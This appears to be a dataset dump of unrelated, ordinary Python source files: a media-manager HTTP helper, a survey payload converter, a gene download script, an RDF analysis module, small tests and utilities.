'html': 'html',
'java': 'java',
'js': 'js',
'm': 'm',
'php': 'php',
'py': 'py',
'rb': 'rb',
'rs': 'rs',
'scala': 'scala',
'sh': 'sh',
'swift': 'swift',
'ts': 'ts',
'xml': 'xml',
}
lang_id_to_file = {}
for line in sys.stdin:
data = json.loads(line)
for (_, diff_after), (_, path_after) in zip(data['diffs'], data['paths']):
if len(diff_after.strip()) < 5 or len(diff_after) > 256:
continue
extension = path_after.rsplit('.', 1)[-1]
lang_id = extension_mapping.get(extension)
if lang_id is None:
continue
# Create 'data/train/p-{lang_id}' directory if not exists
if not os.path.exists(TRAIN_DIR / f'p-{lang_id}'):
os.makedirs(TRAIN_DIR / f'p-{lang_id}')
if lang_id in lang_id_to_file:
f = lang_id_to_file[lang_id]
else:
f = open(TRAIN_DIR / f'p-{lang_id}' / 'github.txt', mode='w')
lang_id_to_file[lang_id] = f
f.write(diff_after)
f.write('\n')
for f in lang_id_to_file.values():
f.close()
if __name__ == '__main__':
main()
| 2.8125 | 3 |
lib/common.py | thk4711/mediamanager | 0 | 12765082 | <reponame>thk4711/mediamanager
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time
import socket
import urllib.request
import os
import re
import argparse
import alsaaudio
import _thread
import select
import smbus
import errno
http_get_handler = None
#------------------------------------------------------------------------------#
# make a http get request #
#------------------------------------------------------------------------------#
def get_data(host,port,action):
if check_port(port, host):
return('failed')
url = 'http://' + host + ':' + str(port) + '/action=' + action
try:
data = urllib.request.urlopen(url).read()
except:
data = 'failed'
return(data)
#------------------------------------------------------------------------------#
# get command line args for frontend #
#------------------------------------------------------------------------------#
def init_frontend():
global mixer
global volume
global old_volume
global blocked
blocked = False
parser = argparse.ArgumentParser(description='media helper')
parser.add_argument('-p', '--port', type=int, help='manager port', required=True)
parser.add_argument('-ho', '--host', type=str, help='manager host', required=False, default='localhost')
parser.add_argument('-m', '--mixer', type=str, help='volume mixer name', required=True)
parser.add_argument('-c', '--configport', type=int, help='management port of frontend', required=True)
args = parser.parse_args()
mixer_name = args.mixer
mixer = alsaaudio.Mixer(mixer_name)
alsa_val = mixer.getvolume()
value = alsa_val[0]
volume = value
old_volume = -1
return(args)
#------------------------------------------------------------------------------#
# watch volume changes #
#------------------------------------------------------------------------------#
def control_watch():
global volume
poll = select.poll()
descriptors = mixer.polldescriptors()
poll.register(descriptors[0][0])
while True:
if blocked == False:
events = poll.poll()
mixer.handleevents()
for e in events:
alsa_val = mixer.getvolume()
value = alsa_val[0]
volume = value
time.sleep(0.5)
#------------------------------------------------------------------------------#
# start thread for watching volume change #
#------------------------------------------------------------------------------#
def run_control_watch():
try:
_thread.start_new_thread( control_watch, () )
except:
print("Error: unable to start thread control watch")
#------------------------------------------------------------------------------#
# check if port is open #
#------------------------------------------------------------------------------#
def check_port(port,host):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((host,port))
is_not_working = True
if result == 0:
is_not_working = False
else:
print('Port', port, 'is not open')
return(is_not_working)
#------------------------------------------------------------------------------#
# http request handler #
#------------------------------------------------------------------------------#
class Server(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
path = self.path
if '.css' in path:
self.send_header('Content-type', 'text/css')
elif '.js' in path:
self.send_header('Content-type', 'text/javascript')
else:
self.send_header('Content-type', 'text/html')
self.end_headers()
# process get requests
def do_GET(self):
self._set_headers()
path = self.path
data = http_get_handler(split_path(path))
self.wfile.write(data)
# send headder
def do_HEAD(self):
self._set_headers()
def log_message(self, format, *args):
return
#------------------------------------------------------------------------------#
# run the http server in backgroung #
#------------------------------------------------------------------------------#
def run_http(port):
server_class=HTTPServer
handler_class=Server
server_address = ('', port)
httpd = server_class(server_address, handler_class)
http_thread = threading.Thread(target = httpd.serve_forever, args=())
http_thread.daemon = True
http_thread.start()
#------------------------------------------------------------------------------#
# split path #
#------------------------------------------------------------------------------#
def split_path(path):
path = path[1:]
data = {}
elements = path.split('/')
for element in elements:
try:
key, value = element.split('=',2)
data[key] = value
except:
pass
return(data)
#------------------------------------------------------------------------------#
# read config file #
#------------------------------------------------------------------------------#
def read_config(config_file):
section = ''
if not os.path.isfile(config_file):
print('ERROR config file', config_file, 'does not exist')
exit(1)
conf = {}
with open(config_file) as f:
content = f.readlines()
for line in content:
line = line.strip()
if line.startswith("#"):
continue
if line.startswith("["):
section = re.findall(r"^\[(.+)\]$", line)[0]
conf[section] = {}
continue
if '=' in line:
key,value = line.split('=',1)
key = key.strip()
value = value.strip()
if value == 'True':
value = True
elif value == 'False':
value = False
elif re.match(r'^([\d]+)$', value) :
value = int(value)
conf[section][key] = value
return(conf)
#-----------------------------------------------------------------#
# extract hardware config from config #
#-----------------------------------------------------------------#
def get_hardware_conf(conf):
hardware = {}
if 'hardware' in conf:
for item in conf['hardware']:
type , number_string = conf['hardware'][item].split(':',1)
number = int(number_string)
if type not in hardware:
hardware[type]={}
hardware[type][item] = number
return hardware
#-----------------------------------------------------------------#
# check if i2c device is present #
#-----------------------------------------------------------------#
def check_smbus(device_address, bus_number = 1):
try:
bus = smbus.SMBus(bus_number)
bus.write_byte(device_address, 0)
except:
print(f'unable to fine i2c device {hex(device_address)} on bus {bus_number}')
exit(1)
#-----------------------------------------------------------------#
# read GPIO usage of kernel modules #
#-----------------------------------------------------------------#
def get_kernel_gpio_usage():
gpios={}
file = open('/sys/kernel/debug/gpio', 'r')
lines = file.readlines()
flag = False
for index, line in enumerate(lines):
line = " ".join(line.split())
if line.startswith('gpiochip'):
if line.startswith('gpiochip0'):
flag = True
else:
flag = False
if line.startswith('gpio-') and flag:
parts = line.split()
num = int(parts[0].replace('gpio-',''))
result = re.search('\( \|(.*) \)', line)
usage = result.group(1)
gpios[usage] = num
file.close()
return(gpios)
| 2.25 | 2 |
app/submitter/converter.py | ONSdigital/eq-questionnaire-runner | 3 | 12765083 | from typing import Mapping
from structlog import get_logger
from app.questionnaire.questionnaire_schema import DEFAULT_LANGUAGE_CODE
from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1
from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3
logger = get_logger()
class DataVersionError(Exception):
def __init__(self, version):
super().__init__()
self.version = version
def __str__(self):
return f"Data version {self.version} not supported"
def convert_answers(
schema, questionnaire_store, routing_path, submitted_at, flushed=False
):
"""
Create the JSON answer format for down stream processing in the following format:
```
{
'tx_id': '0f534ffc-9442-414c-b39f-a756b4adc6cb',
'type' : 'uk.gov.ons.edc.eq:surveyresponse',
'version' : '0.0.1',
'origin' : 'uk.gov.ons.edc.eq',
'survey_id': '021',
'flushed': true|false
'collection':{
'exercise_sid': 'hfjdskf',
'schema_name': 'yui789',
'period': '2016-02-01'
},
'started_at': '2016-03-06T15:28:05Z',
'submitted_at': '2016-03-07T15:28:05Z',
'launch_language_code': 'en',
'channel': 'RH',
'metadata': {
'user_id': '789473423',
'ru_ref': '432423423423'
},
'data': [
...
],
}
```
Args:
schema: QuestionnaireSchema instance with populated schema json
questionnaire_store: EncryptedQuestionnaireStorage instance for accessing current questionnaire data
routing_path: The full routing path followed by the user when answering the questionnaire
submitted_at: The date and time of submission
flushed: True when system submits the users answers, False when submitted by user.
Returns:
Data payload
"""
metadata = questionnaire_store.metadata
response_metadata = questionnaire_store.response_metadata
answer_store = questionnaire_store.answer_store
list_store = questionnaire_store.list_store
survey_id = schema.json["survey_id"]
payload = {
"case_id": metadata["case_id"],
"tx_id": metadata["tx_id"],
"type": "uk.gov.ons.edc.eq:surveyresponse",
"version": schema.json["data_version"],
"origin": "uk.gov.ons.edc.eq",
"survey_id": survey_id,
"flushed": flushed,
"submitted_at": submitted_at.isoformat(),
"collection": build_collection(metadata),
"metadata": build_metadata(metadata),
"launch_language_code": metadata.get("language_code", DEFAULT_LANGUAGE_CODE),
}
optional_properties = get_optional_payload_properties(metadata, response_metadata)
if schema.json["data_version"] == "0.0.3":
payload["data"] = {
"answers": convert_answers_to_payload_0_0_3(
answer_store, list_store, schema, routing_path
),
"lists": list_store.serialize(),
}
elif schema.json["data_version"] == "0.0.1":
payload["data"] = convert_answers_to_payload_0_0_1(
metadata, answer_store, list_store, schema, routing_path
)
else:
raise DataVersionError(schema.json["data_version"])
logger.info("converted answer ready for submission")
return payload | optional_properties
def build_collection(metadata) -> Mapping[str, str]:
return {
"exercise_sid": metadata["collection_exercise_sid"],
"schema_name": metadata["schema_name"],
"period": metadata["period_id"],
}
def build_metadata(metadata) -> Mapping[str, str]:
downstream_metadata = {"user_id": metadata["user_id"], "ru_ref": metadata["ru_ref"]}
if metadata.get("ref_p_start_date"):
downstream_metadata["ref_period_start_date"] = metadata["ref_p_start_date"]
if metadata.get("ref_p_end_date"):
downstream_metadata["ref_period_end_date"] = metadata["ref_p_end_date"]
if metadata.get("display_address"):
downstream_metadata["display_address"] = metadata["display_address"]
return downstream_metadata
def get_optional_payload_properties(metadata, response_metadata) -> Mapping[str, str]:
payload = {}
for key in ["channel", "case_type", "form_type", "region_code", "case_ref"]:
if value := metadata.get(key):
payload[key] = value
if started_at := response_metadata.get("started_at"):
payload["started_at"] = started_at
return payload
| 2.453125 | 2 |
phylotyper/data/download/blast_stx1a_genes.py | superphy/insilico-subtyping | 5 | 12765084 | <gh_stars>1-10
#!/usr/bin/env python
"""Download Stx1a gene sequences from Genbank
Example:
$ python blast_stx1a_genes.py .
"""
import argparse
import csv
import logging
import os
import re
from Bio import SeqIO
from utils import DownloadUtils, SubtypeParser, GeneFilter
from blast import Blast
__author__ = "<NAME>"
__copyright__ = "Copyright Government of Canada 2012-2015. Funded by the Government of Canada Genomics Research and Development Initiative"
__license__ = "APL"
__version__ = "2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
logging.basicConfig(
filename='blast_stx1a_genes.log',
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
filemode='w')
logger = logging.getLogger(__name__)
if __name__ == "__main__":
"""Run
"""
# Parse command-line args
parser = argparse.ArgumentParser(description='Download and store NCBI blast results')
parser.add_argument('fasta_file', action="store")
parser.add_argument('output_directory', action="store")
args = parser.parse_args()
tmp_fasta_file = os.path.join(args.output_directory, 'tmp.fasta')
# blast = Blast("Escherichia coli")
# blast.run(args.fasta_file, tmp_fasta_file)
# Initialize serotype parser
seq_tests = [lambda x: len(x) > 900]
gfilter = GeneFilter(sequence_tests=seq_tests)
# Initialize Subtype parser
subtype_names = '(1a|1b|1c|1d)\b'
pattern1 = "(?:stx)?[-_\s]?%s" % subtype_names
parser = SubtypeParser([re.compile(pattern1, flags=re.IGNORECASE)], source_fields=['organism','strain'],
annotation_fields=['source','organism'])
# Initialize Download object
dutil = DownloadUtils(args.output_directory, '<NAME>', ['stx1a'], parser, gfilter)
# Perform Downloads
dutil.download_by_accession(tmp_fasta_file, fasta_format=True)
# Parse genbank files for H-types
dutil.parse_subtype()
# Generate final output
invalid = set([])
subtypes = {}
for row in csv.reader(open(dutil.subtypefile,'r'),delimiter='\t'):
name = row[0]
subt = row[1]
if not name in subtypes:
# Never seen before
subtypes[name] = subt
elif subtypes[name] == subt:
# Non-conflicting duplicates
logger.info("Duplicate instances of {}, subtype:{} in subtype file: {}".format(name,subt,dutil.subtypefile))
else:
# Conflict
logger.warning("Duplicate instances of {} with conflicting subtypes: {} vs {} in subtype file: {}. Removing entry.".format(name,subt,
subtypes[name],dutil.subtypefile))
invalid.add(name)
seqs = {}
invalid2 = set([])
with open(tmp_fasta_file, 'r') as infh:
for seqrecord in SeqIO.parse(infh, 'fasta'):
name = seqrecord.id
seq = seqrecord.seq
if not name in invalid:
if name in subtypes:
# Has matching subtype
if name in seqs:
# Duplicate in fasta file
if seqs[name] == seq:
logger.info("Duplicate instances of {} in fasta file: {}".format(name, dutil.fastafile))
else:
logger.warning("Duplicate instances of {} with conflicting sequences in fasta file: {}".format(name, dutil.fastafile))
invalid2.add(name)
else:
# novel sequence with subtype
seqs[name] = seq
else:
# No matching subtype
logger.info("No subtype for sequence {} in fasta file: {}".format(name, dutil.fastafile))
with open(dutil.fastafile, 'w') as outfh, open(dutil.subtypefile, 'w') as subtfh:
for name in seqs:
outfh.write('>{}\n{}\n'.format(name, seqs[name]))
subtfh.write('{}\t{}\n'.format(name, subtypes[name]))
| 2.6875 | 3 |
Trescope4Python/example/src/example_add_control.py | chenhebing/Trescope | 1 | 12765085 | import os
from typing import List
from trescope import Trescope
from trescope.config import ImageConfig
from trescope.controller import EnumControl
from trescope.toolbox import simpleDisplayOutputs
import pandas as pd
def clearTrescope():
for i in range(4): Trescope().selectOutput(i).clear()
def add_control():
path = '../data/res/model_images'
model_images: List[str] = os.listdir(path)
Trescope().initialize(True, simpleDisplayOutputs(1, 4))
df = pd.DataFrame({'file': [], 'shape': [], 'thickness': []})
batch_size = 2
for batch_index in range(len(model_images) // batch_size):
clearTrescope()
for sample_index in range(batch_size):
model_image_path = model_images[batch_index * batch_size + sample_index]
Trescope().selectOutput(sample_index * 2).plotImage(os.path.join(path, model_image_path)).withConfig(ImageConfig())
(Trescope().selectOutput(sample_index * 2 + 1).asInput()
.addControl(EnumControl().id('file').label('File').enumeration(model_image_path).defaultValue(model_image_path))
.addControl(EnumControl().id('shape').label('Circle or Square').enumeration('circle', 'square').defaultValue('circle'))
.addControl(EnumControl().id('thickness').label('Size').enumeration('xs', 's', 'm', 'l', 'xl').defaultValue('m')))
label_data = Trescope().breakPoint(f'batch_index:{batch_index}')
for row in label_data.values(): df = df.append({'file': row['file'], 'shape': row['shape'], 'thickness': row['thickness']}, ignore_index=True)
print(df)
if __name__ == '__main__':
add_control()
| 2.21875 | 2 |
starpolymers/analysis/rdf.py | jakublala/starpolymers | 6 | 12765086 | <reponame>jakublala/starpolymers
import numpy as np
import scipy.spatial.distance as D
import pandas as pd
from math import pi
import matplotlib.pyplot as plt
def _volume(bins):
shell_width = bins[1] - bins[0]
return 4 * pi * bins ** 2 * shell_width
def _get_distance_vector(first, second, rmin, rmax):
array = D.cdist(first, second)
vector = np.ravel(array)
vector = vector[vector>=rmin]
vector = vector[vector<rmax]
return vector
def _bins(rmin, rmax, binwidth):
return np.arange(rmin, rmax, binwidth)
def _get_histogram(vector, bins):
return np.histogram(vector, bins=bins)
def _get_rdf(histogram_object, bulk_density):
bins = histogram_object[1] + 0.5
bins = bins[:-1]
values = histogram_object[0] / _volume(bins)
data = pd.DataFrame()
data['r'] = bins
data['g(r)'] = values / bulk_density
return data
def _get_condensed_radius(df):
return df['r'][df['g(r)'].idxmax]
def _plot_rdf(rdf, ax):
ax.plot(rdf.values[:,0], rdf.values[:,1],'-')
ax.set_xlabel('r', fontsize='large')
ax.set_ylabel('g(r)', fontsize='large')
def _get_average(RDF_LIST):
counter = 0
dataframe = pd.DataFrame()
temp = pd.DataFrame()
for rdf in RDF_LIST:
counter +=1
if counter == 1:
dataframe['r'] = rdf.rdf['r']
temp[counter] = rdf.rdf['g(r)'].values
dataframe['g(r)'] = np.mean(temp.values, axis=1)
return dataframe
def _get_NC(first, second, cutoff):
count = 0
for atom in second:
distances = D.cdist(first, atom.reshape(1,3))
if not len(distances[distances<=cutoff]):
continue
else:
count+=1
return count
class RDF():
def __init__(self, atoms1, atoms2, bin_width=1.0, rmin=0.0, rmax=20.0, L=70, condensed_radius=None):
self.distances = _get_distance_vector(atoms1, atoms2, rmin, rmax)
self.histogram = _get_histogram(self.distances, _bins(rmin, rmax, bin_width))
self.density = float(len(atoms2)) / L ** 3
self.rdf = _get_rdf(self.histogram, self.density)
if condensed_radius != None:
self.condensed_radius = condensed_radius
else:
self.condensed_radius = _get_condensed_radius(self.rdf)
self.NC = _get_NC(atoms1, atoms2, self.condensed_radius)
def plot(self, show=True):
fig, ax = plt.subplots()
_plot_rdf(self.rdf, ax)
if show:
plt.show()
class RDF_AVERAGE():
def __init__(self, RDF_LIST):
self.rdf = _get_average(RDF_LIST)
def plot(self, show=True):
fig, ax = plt.subplots()
_plot_rdf(self.rdf, ax)
if show:
plt.show()
def _collate(RDF_LIST):
counter = 1
results = pd.DataFrame()
for i in RDF_LIST:
if counter == 1:
results['r'] = i.rdf['r']
results['{}_g(r)'.format(counter)] = i.rdf['g(r)']
counter+=1
return results
def _plot_list(RDF_LIST_OBJ, ax):
for i in range(1, RDF_LIST_OBJ.N+1):
ax.plot(RDF_LIST_OBJ.rdf['r'], RDF_LIST_OBJ.rdf['{}_g(r)'.format(i)], '-', label=i)
class RDF_LIST():
def __init__(self, RDF_LIST):
self.N = len(RDF_LIST)
self.rdf = _collate(RDF_LIST)
def plot(self, show=True):
fig, ax = plt.subplots()
_plot_list(self, ax)
ax.set_xlabel('r', fontsize='large')
ax.set_ylabel('g(r)',fontsize='large')
ax.legend()
if show:
plt.show() | 2.671875 | 3 |
tests/keras/layers/test_embeddings.py | nishank974/Keras | 2 | 12765087 | import pytest
import numpy as np
from numpy.testing import assert_allclose
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten
from keras.layers.embeddings import Embedding
from keras.constraints import unitnorm
from keras import backend as K
X1 = np.array([[1], [2]], dtype='int32')
W1 = np.array([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')
def test_unitnorm_constraint():
lookup = Sequential()
lookup.add(Embedding(3, 2, weights=[W1],
W_constraint=unitnorm(),
input_length=1))
lookup.add(Flatten())
lookup.add(Dense(1))
lookup.add(Activation('sigmoid'))
lookup.compile(loss='binary_crossentropy', optimizer='sgd',
class_mode='binary')
lookup.train_on_batch(X1, np.array([[1], [0]], dtype='int32'))
norm = np.linalg.norm(K.get_value(lookup.trainable_weights[0]), axis=0)
assert_allclose(norm, np.ones_like(norm).astype('float32'), rtol=1e-05)
if __name__ == '__main__':
pytest.main([__file__])
| 2.328125 | 2 |
arametrics-test-app/config/config.py | AravinthPanch/araMetrics | 0 | 12765088 | TEST_API_ENDPOINT='https://aravinth.info'
| 1.015625 | 1 |
tests/_OLD_test_sensor_SenseHat.py | mlanser/sciLab-sensorMod | 0 | 12765089 | import time
import pytest
from libs.sensorMod.src.sensor_SenseHat import Sensor
# =========================================================
# G L O B A L S & P Y T E S T F I X T U R E S
# =========================================================
@pytest.fixture()
def valid_attribs():
return {
'repeat': 1, # Number of times to run speed test
'holdTime': 60, # Amount of time between tests
'location': '- n/a -',
'locationTZ': 'Etc/UTC',
'tempUnit': 'C', # Temp display unit: 'C' (Celsius), 'F' (Fahrenheit), 'K' (Kelvin)
'enviro': True, # Get environmental data (i.e. temperature, humidity, and pressure)
'IMU': True, # Get IMU (inertial measurement unit) data
}
def _init_sensor(mocker, attribs):
sensor = Sensor(attribs)
mocker.patch.object(sensor._sensehat, 'get_temperature')
mocker.patch.object(sensor._sensehat, 'get_temperature_from_humidity')
mocker.patch.object(sensor._sensehat, 'get_humidity')
mocker.patch.object(sensor._sensehat, 'get_pressure')
mocker.patch.object(sensor._sensehat, 'get_orientation')
mocker.patch.object(sensor._sensehat, 'get_compass_raw')
mocker.patch.object(sensor._sensehat, 'get_accelerometer_raw')
mocker.patch.object(sensor._sensehat, 'get_gyroscope_raw')
mocker.patch.object(time, 'sleep')
return sensor
# =========================================================
# T E S T F U N C T I O N S
# =========================================================
@pytest.mark.smoke
def test_get_data(mocker, valid_attribs):
attribs = valid_attribs
sensor = _init_sensor(mocker, attribs)
sensor.get_data()
sensor._sensehat.get_temperature.assert_called_once()
sensor._sensehat.get_temperature_from_humidity.assert_called_once()
sensor._sensehat.get_humidity.assert_called_once()
sensor._sensehat.get_pressure.assert_called_once()
sensor._sensehat.get_orientation.assert_called_once()
sensor._sensehat.get_compass_raw.assert_called_once()
sensor._sensehat.get_accelerometer_raw.assert_called_once()
sensor._sensehat.get_gyroscope_raw.assert_called_once()
| 2.203125 | 2 |
python/problems/jewels_and_stones.py | vivaxy/algorithms | 1 | 12765090 | """
https://leetcode.com/problems/jewels-and-stones/
https://leetcode.com/submissions/detail/138688434/
"""
class Solution:
def numJewelsInStones(self, J, S):
"""
:type J: str
:type S: str
:rtype: int
"""
result = 0
for stone in J:
result += S.count(stone)
return result
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.numJewelsInStones('aA', 'aAAbbbb'), 3)
self.assertEqual(solution.numJewelsInStones('z', 'ZZ'), 0)
if __name__ == '__main__':
unittest.main()
| 3.734375 | 4 |
src/deepsparse/utils/data.py | SkalskiP/deepsparse | 460 | 12765091 | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import numpy
from deepsparse.utils.log import log_init
__all__ = [
"arrays_to_bytes",
"bytes_to_arrays",
"verify_outputs",
]
log = log_init(os.path.basename(__file__))
def arrays_to_bytes(arrays: List[numpy.array]) -> bytearray:
"""
:param arrays: List of numpy arrays to serialize as bytes
:return: bytearray representation of list of numpy arrays
"""
to_return = bytearray()
for arr in arrays:
arr_dtype = bytearray(str(arr.dtype), "utf-8")
arr_shape = bytearray(",".join([str(a) for a in arr.shape]), "utf-8")
sep = bytearray("|", "utf-8")
arr_bytes = arr.ravel().tobytes()
to_return += arr_dtype + sep + arr_shape + sep + arr_bytes
return to_return
def bytes_to_arrays(serialized_arr: bytearray) -> List[numpy.array]:
"""
:param serialized_arr: bytearray representation of list of numpy arrays
:return: List of numpy arrays decoded from input
"""
sep = "|".encode("utf-8")
arrays = []
i_start = 0
while i_start < len(serialized_arr) - 1:
i_0 = serialized_arr.find(sep, i_start)
i_1 = serialized_arr.find(sep, i_0 + 1)
arr_dtype = numpy.dtype(serialized_arr[i_start:i_0].decode("utf-8"))
arr_shape = tuple(
[int(a) for a in serialized_arr[i_0 + 1 : i_1].decode("utf-8").split(",")]
)
arr_num_bytes = numpy.prod(arr_shape) * arr_dtype.itemsize
arr_str = serialized_arr[i_1 + 1 : arr_num_bytes + (i_1 + 1)]
arr = numpy.frombuffer(arr_str, dtype=arr_dtype).reshape(arr_shape)
arrays.append(arr.copy())
i_start = i_1 + arr_num_bytes + 1
return arrays
def verify_outputs(
outputs: List[numpy.array],
gt_outputs: List[numpy.array],
atol: float = 8.0e-4,
rtol: float = 0.0,
) -> List[float]:
"""
Compares two lists of output tensors, checking that they are sufficiently similar
:param outputs: List of numpy arrays, usually model outputs
:param gt_outputs: List of numpy arrays, usually reference outputs
:param atol: Absolute tolerance for allclose
:param rtol: Relative tolerance for allclose
:return: The list of max differences for each pair of outputs
"""
max_diffs = []
if len(outputs) != len(gt_outputs):
raise Exception(
f"number of outputs doesn't match, {len(outputs)} != {len(gt_outputs)}"
)
for i in range(len(gt_outputs)):
gt_output = gt_outputs[i]
output = outputs[i]
if output.shape != gt_output.shape:
raise Exception(
f"output shapes don't match, {output.shape} != {gt_output.shape}"
)
if type(output) != type(gt_output):
raise Exception(
f"output types don't match, {type(output)} != {type(gt_output)}"
)
max_diff = numpy.max(numpy.abs(output - gt_output))
max_diffs.append(max_diff)
log.info(f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}")
if not numpy.allclose(output, gt_output, rtol=rtol, atol=atol):
raise Exception(
"output data doesn't match\n"
f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}\n"
f" mean = {numpy.mean(output):.5f} {numpy.mean(gt_output):.5f}\n"
f" std = {numpy.std(output):.5f} {numpy.std(gt_output):.5f}\n"
f" max = {numpy.max(output):.5f} {numpy.max(gt_output):.5f}\n"
f" min = {numpy.min(output):.5f} {numpy.min(gt_output):.5f}"
)
return max_diffs
| 2.484375 | 2 |
scripts/busqueda_codon_secuencia.py | rod13-afk/python_class | 0 | 12765092 | <gh_stars>0
'''
NAME
Busqueda del Codón inicial y secuencia transcrita
VERSION
1.0
AUTHOR
<NAME>
DESCRIPTION
Find the start codon and the transcribed sequence
CATEGORY
Genomic sequence
INPUT
Read a DNA sequence entered by the user
OUTPUT
Returns as output the start and end positions of the sequence
to be transcribed and its nucleotide sequence
EXAMPLES
Input
dna = 'AAGGTACGTCGCGCGTTATTAGCCTAAT'
Output
El codon AUG empieza en la posicion 4 y termina en 19, tomando en cuenta el 0 como
la posicion del primer nucleotido.
Fragmento de RNA que es transcrito representado en DNA es: TACGTCGCGCGTTAT
Fragmento de RNA que es transcrito representado en RNA es: UACGUCGCGCGUUAU
'''
print('Introduzca la secuencia de DNA de interes:')
dna = input() # La secuencia input se almacena en la variable dna
codon_inicio = 'TAC'
codon_termino = 'ATT'
'''El metodo str.find() devuelve el índice más bajo en el que se encuentre
el codon de inicio, aplicado tambien para encontrar la posicion del codon de termino'''
inicio = dna.find(codon_inicio)
final = dna.find(codon_termino)
'''Se corta la secuencia para obtener la secuencia transcrita y se suma 2 para
incluir el codon de paro completo en el output'''
transcrito = dna[inicio:final + 2]
print('El codon AUG empieza en la posicion ' + str(inicio) + ' y termina en ' + str(final + 2) + ', tomando en cuenta el 0 como la posicion del primer nucleotido.')
print('Fragmento de RNA que es transcrito representado en DNA es: ' + transcrito)
print('Fragmento de RNA que es transcrito representado en RNA es: ' + transcrito.replace('T', 'U'))
| 4.09375 | 4 |
py/gps_building_blocks/airflow/utils/errors.py | miguelfc/gps_building_blocks | 0 | 12765093 | # python3
# coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Errors file for this data connector component.
All exceptions defined by the library should be in this file.
"""
from typing import Text
class Error(Exception):
"""Base error class for all Exceptions.
Can store a custom message and a previous error, if exists, for more
details and stack tracing use.
"""
def __init__(self, msg: Text = '', error: Exception = None) -> None:
super(Error, self).__init__()
self.msg = msg
self.prev_error = error
def __repr__(self) -> Text:
reason = '%s' % type(self).__name__
if self.msg:
reason += ' %s' % self.msg
if self.prev_error:
reason += ': %s' % str(self.prev_error)
return reason
__str__ = __repr__
# Datastore related errors
class DatastoreError(Error):
"""Raised when Datastore returns an error."""
pass
class DatastoreRunQueryError(DatastoreError):
"""Raised when querying Datastore returns an error."""
pass
class DatastoreCommitError(DatastoreError):
"""Error occurred while committing to Datastore."""
pass
class DatastoreInsertBlobInfoError(DatastoreCommitError):
"""Error occurred while inserting blob info into Datastore."""
pass
class DatastoreUpdateBlobInfoError(DatastoreCommitError):
"""Error occurred while updating blob info in Datastore."""
pass
# Data in connector related errors
class DataInConnectorError(Error):
"""Raised when an input data source connector returns an error."""
pass
class DataInConnectorBlobParseError(DataInConnectorError):
"""Error occurred while parsing blob contents."""
pass
class DataInConnectorValueError(DataInConnectorError):
"""Error occurred due to a wrong value being passed on."""
pass
# Data out connector related errors
class DataOutConnectorError(Error):
"""Raised when an output data source connector returns an error."""
pass
class DataOutConnectorValueError(DataOutConnectorError):
"""Error occurred due to a wrong value being passed on."""
pass
class DataOutConnectorInvalidPayloadError(DataOutConnectorError):
"""Error occurred constructing or handling payload."""
pass
class DataOutConnectorSendUnsuccessfulError(DataOutConnectorError):
"""Error occurred while sending data to data out source."""
pass
class DataOutConnectorBlobReplacedError(DataOutConnectorError):
"""Error occurred while sending blob contents and Blob was replaced."""
pass
class DataOutConnectorBlobProcessError(DataOutConnectorError):
"""Error occurred while sending some parts of blob contents."""
pass
| 2.59375 | 3 |
optaradio/ui/input/keyboard.py | p4cx/optaradio | 2 | 12765094 | import sys
import pygame as pg
from ui.input import control
def check_keyboard_events(window, state):
def close():
pg.quit()
sys.exit()
events = pg.event.get()
for event in events:
if event.type == pg.QUIT:
close()
elif event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE:
close()
elif event.type == pg.KEYDOWN and event.key == pg.K_RETURN:
control.central_button(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_UP:
control.scroll_menu_up(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_DOWN:
control.scroll_menu_down(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_q:
control.back(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_w:
control.switch_audio(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_e:
control.switch_led(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_r:
control.open_setting(window, state)
elif event.type == pg.KEYDOWN and event.key == pg.K_1:
control.play_favourite(window, state, 1)
elif event.type == pg.KEYDOWN and event.key == pg.K_2:
control.play_favourite(window, state, 2)
elif event.type == pg.KEYDOWN and event.key == pg.K_3:
control.play_favourite(window, state, 3)
elif event.type == pg.KEYDOWN and event.key == pg.K_4:
control.play_favourite(window, state, 4)
elif event.type == pg.KEYDOWN and event.key == pg.K_5:
control.play_favourite(window, state, 5)
elif event.type == pg.KEYDOWN and event.key == pg.K_6:
control.play_favourite(window, state, 6)
elif event.type == pg.KEYDOWN and event.key == pg.K_7:
control.play_favourite(window, state, 7)
return events
| 2.84375 | 3 |
elit/optimizers/adamw/__init__.py | emorynlp/levi-graph-amr-parser | 9 | 12765095 | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-11-11 18:44
import tensorflow as tf
from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay
